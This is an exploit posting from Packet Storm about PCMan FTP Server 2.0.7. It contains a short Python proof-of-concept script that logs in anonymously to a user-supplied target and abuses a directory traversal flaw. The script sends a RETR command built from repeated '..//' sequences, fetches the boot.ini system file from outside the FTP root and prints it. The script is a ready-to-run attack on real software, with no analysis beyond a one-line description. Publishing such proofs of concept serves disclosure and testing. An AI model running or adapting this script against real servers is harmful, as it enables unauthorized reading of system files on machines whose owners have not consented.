PCMan FTP Server version 2.0.7 suffers from a directory traversal vulnerability.
e377ce572fb44bf79adeccd6d80f6e799f096b1c0279f26b2d558839516a13bd#!/usr/bin/python
# title: PCMan FTP Server v2.0.7 Directory Traversal
# author: Jay Turla <@shipcod3>
# tested on Windows XP Service Pack 3 - English
# software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# description: PCMAN FTP 2.07 is vulnerable to Directory Traversal (quick and dirty code just for PoC)
from ftplib import FTP
ftp = FTP(raw_input("Target IP: "))
ftp.login()
ftp.retrbinary('RETR ..//..//..//..//..//..//..//..//..//..//..//boot.ini', open('boot.ini.txt', 'wb').write)
ftp.close()
file = open('boot.ini.txt', 'r')
print "[**] Printing what's inside boot.ini\n"
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
print file.read()
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed